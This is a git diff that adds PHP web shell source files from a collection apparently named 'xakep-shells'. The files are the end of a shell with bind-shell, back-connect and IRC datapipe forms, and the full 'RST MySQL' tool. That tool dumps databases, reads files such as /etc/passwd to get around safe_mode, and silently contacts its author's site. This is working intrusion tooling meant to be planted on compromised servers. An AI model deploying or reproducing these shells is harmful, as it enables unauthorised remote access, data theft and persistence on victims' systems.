+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/sql.php.php.txt b/xakep-shells/PHP/sql.php.php.txt
new file mode 100644
index 0000000..5e90346
--- /dev/null
+++ b/xakep-shells/PHP/sql.php.php.txt
@@ -0,0 +1,1694 @@
+<?php
+error_reporting(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@set_magic_quotes_runtime(0); //���������� �� ������ ��� ��������� ������ �� �����
+$self=$HTTP_SERVER_VARS['PHP_SELF'];
+if(!ini_GET("register_globals")){ 
+import_request_variables("GPC"); 
+}
+//���� php ������� �����, ���������� �� ���.����� ����� ������� ��� �� ���������� 
+//��������, ��� � �� ���� ����������, ������� ���������� ��� register_globals=on
+if (GET_magic_quotes_gpc()) strips($GLOBALS);
+function strips(&$el) { 
+  if (is_array($el)) { 
+    foreach($el as $k=>$v) { 
+      if($k!='GLOBALS') { 
+        strips($el[$k]); 
+      } 
+    } 
+  } else { 
+    $el = stripslashes($el); 
+  } 
+}
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+    $file = "C:\\tmp\\dump_".$db.".sql";
+    $p_v=$SystemRoot."\my.ini";
+    $os="win";
+} else {
+    $file = "/tmp/dump_".$db.".sql"; 
+    $p_v="/etc/passwd";
+}
+if ($HTTP_GET_VARS['send']=='send_http') {
+function download($file, $type = false, $name = false, $down = false) { 
+if(!file_exists($file)) exit; 
+if(!$name) $name = basename($file); 
+if($down) $type = "application/force-download"; 
+else if(!$type) $type = "application/download"; 
+$disp = $down ? "attachment" : "inline";
+header("Content-disposition: ".$disp."; filename=".$name); 
+header("Content-length: ".filesize($file)); 
+header("Content-type: ".$type); 
+header("Connection: close"); 
+header("Expires: 0");
+set_time_limit(0); 
+readfile($file); 
+unlink($file);
+exit; 
+} 
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if (sizeof($tabs) == 0) { 
+      // �������� ������ ������ ���� 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");        
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+}
+if ($HTTP_GET_VARS['strukt']=='t_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+   fclose($fp); 
+}
+download($f_dump);
+}
+function send_header() {
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+}
+if ($HTTP_GET_VARS['img']=='st_form_bg') {
+   $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
+   send_header();
+   echo base64_decode($st_form_bg);
+}
+if ($HTTP_GET_VARS['img']=='bg_f') {
+$bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'.
+      'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'.
+      'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs=';
+   send_header();
+   echo base64_decode($bg_f);
+}
+if ($HTTP_GET_VARS['img']=='b_close') {
+$b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'.
+         'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'.
+         'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'.
+         'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'.
+         'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'.
+         '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
+         'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'.
+         'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'.
+         'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'.
+         'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'.
+         'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'.
+         'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'.
+         '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'.
+         'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'.
+         'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'.
+         'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'.
+         'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'.
+         'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'.
+         'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'.
+         'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7';
+   send_header();
+   echo base64_decode($b_close);
+} 
+$n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");');
+$h_error="<br><table align=center width=500 height=70 bgcolor=red><b>������ � �������:</b><tr><td align=center><br><h5>";
+$f_error="</h5></td></tr></table>
+<CENTER><FORM><INPUT type=\"button\" value=\"   << �����    \" onClick=\"history.go(-1)\"><BR>
+</FORM></CENTER>
+</td></tr></table></td></tr></table>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+ print "
+  <html><HEAD><TITLE>RST MySQL</TITLE>
+
+  <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
+   <style>
+   td {  
+   font-family: verdana, arial, ms sans serif, sans-serif;  
+   font-size: 11px;  
+   color: #000000; 
+   }
+   BODY {
+   margin-top: 4px; 
+   margin-right: 4px; 
+   margin-bottom: 4px; 
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393; 
+   scrollbar-3dlight-color: #000000; 
+   scrollbar-darkshadow-color: #101842; 
+   scrollbar-shadow-color: #ffffff; 
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff; 
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></HEAD><BODY>";
+
+
+if ($sapi_type == "cgi") {
+    $php_type="CGI";
+} else {
+    $php_type="������";
+}
+
+$form_file="
+        <table width=80% align=center border=0>
+        <tr><td align=center>������&nbsp;�������������&nbsp;�����,&nbsp;�������&nbsp;(&nbsp;<b>$server</b>&nbsp;)</td></tr>
+        <tr><td>
+        <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0>
+        <tr bgcolor=#DBDCDD><td align=center>
+        ��� �������, ��� ���� �������� ��� <b>������</b> � ���
+        ������� � ������������ ���������� <b>FILE</b>, <b>SELECT</b>,
+        <b>CREATE</b>, ���������� ���� � ����� - �������� ������ ������������� �����.
+        ����� ����������� ��� <b>safe_mode</b> � <b>safe_basedir</b>
+        </td></tr></table></td></tr>
+        <form method=\"GET\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <tr><td align=center><br>������ ���� � �����: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"�������� ����\">&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table><br>";
+
+$start_form="<br>
+<table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td width=25>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td>
+                <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=200><br>
+        <center><b>������� ��� ������ � MySQL</b></center><hr width=98%>
+        <li>�������� ��� � ������.
+        <li>������������ ������� � ��.
+        <li>�������������� ��� � ������.
+        <li>����� �� ��� ������.<hr width=98%>
+        Type - FREE<br>
+        Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a>
+        <center><br><br><font face=Webdings size=+18 color=#B6B5B5>&#0168;</font><center>
+   </td>
+   <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2>
+        <br>��� ���������� � �������� MySQL ������� <b>���</b>, <b>������</b> (������������ MySQL) � ��� <b>�����</b>.</font></center><br>
+        <li>���� ����� ����� mysql �� ������ ����, �� ��������� ������������� ��� ��������� ��������.
+        <li>���� ������ ����� mysql �� ������ ����, �� ��������� ������������� ������ ������.
+        <li>���� ��� �������� mysql �� ������� ����, �� ��������� ������������� <b>localhost</b>
+        <li>���� ���� ��� �������� mysql �� ������ ����, �������������  ���� �� ���������, ������ (<b>3306</b>)<br><br>
+        <center>������ PHP (<b>".phpversion()."</b>)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ID PHP script (<b>".GET_current_user( )."</b>)</center>
+        <br><table align=center>
+        <tr><td>��� ����� MySQL</td><td align=right>������ ����� MySQL&nbsp;</td></tr>
+        <form method=\"GET\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"y\">
+        <tr>
+          <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td>
+          <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td>
+        </tr>
+        <tr><td>������ MySQL</td><td>����</td></tr>
+        <tr>                
+          <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td>
+          <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\">
+          <input type=\"submit\" value=\"������������\"></td>
+        </tr></table><br>        
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center>
+";
+
+if ($os =='win') {
+$os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>";
+}else{
+   $str_k=$_ENV["BOOT_FILE"];
+   $k=preg_replace ("/[a-zA-Z\/]/","", $str_k);
+   $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>";
+
+}
+
+if (!isset($s) || $HTTP_GET_VARS[s] != 'y') { print $start_form;
+ $serv = array(127,192,172,10);
+ $adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]);
+ if (!in_array($adrr[0], $serv)) {
+   //��� ��������� ����� ������ ������� ������� ��� ��������
+   //����� ������ � ��������� ��������� �� � �����
+   @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>";
+   @readfile ("http://rst.void.ru/version_sql/version.php");  
+ }
+exit;
+}
+
+$form_ad_b="<br>
+<table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> 
+ <tr>
+   <td>
+   <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> 
+    <td>
+      MySQL <b>$server</b> v.(<b>".mysql_GET_server_info()."</b>)
+   </td>
+   <td align=center>
+      <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b>
+   </td>
+   <td align=right>
+      ������ PHP (<b>".phpversion()."</b>) $php_type
+   </td>
+ </tr>
+ <tr bgcolor=#DBDCDD>
+   <td>
+      IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b>
+   </td>
+   <td align=center>
+      ID PHP script (<b>".GET_current_user( )."</b>)
+   </td>
+   <td align=right>
+      $os
+   </td>
+ </tr>
+ </table>
+</td></tr></table>
+<table width=80% align=center border=0 cellpadding=5 cellspacing=1> 
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>���������� MySQL</b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&php=ok\" tarGET=\"_blank\"><b>���������� PHP (ALL)</b></a>
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>�������� MySQL </b></a>
+   </td>
+ </tr>
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>���������� Apache </b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>���������� MySQL </b></a> 
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"�������� ������������� ����� ������� ���� ��� ��������� safe_mode � safe_mode_exec_dir\"><b>���� *?</b></a>
+   </td>
+ </tr>
+</table><br>
+
+<table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+<tr bgcolor=#DBDCDD><td>
+<table align=center cellpadding=0 cellspacing=0>
+ <tr bgcolor=#DBDCDD>
+   <td> <table cellpadding=4><tr><td><b>������� ����� ���� ������</b></td></tr><tr><td>
+        <form method=\"GET\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\">
+        <input type=\"submit\" value=\"�������\"></td>
+        </tr></table>
+   </td>
+ </tr>
+</table>
+</td>    
+</tr></table></form>
+
+<table width=80% align=center border=0 cellpadding=0>
+ <tr align=right>
+   <td width=85%></td>
+   <td width=15>
+    <a href=$self><img src=".$self."?img=b_close border=0 title=close></a>
+  </td>
+ </tr>
+</table>
+";
+        
+$cnt_b=mysql_num_rows(mysql_list_dbs());  // ���-�� ��� mysql �������  
+print "
+<table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td width=33%>
+                <font size=4><b>RST MySQL</b></font>
+            </td>
+            <td width=33% align=center>
+                <font color=blue><b>$server</b></font>&nbsp;[CONNECTION Ok] &nbsp;&nbsp;����� ���: <b>$cnt_b</b>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=170>";
+
+if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){
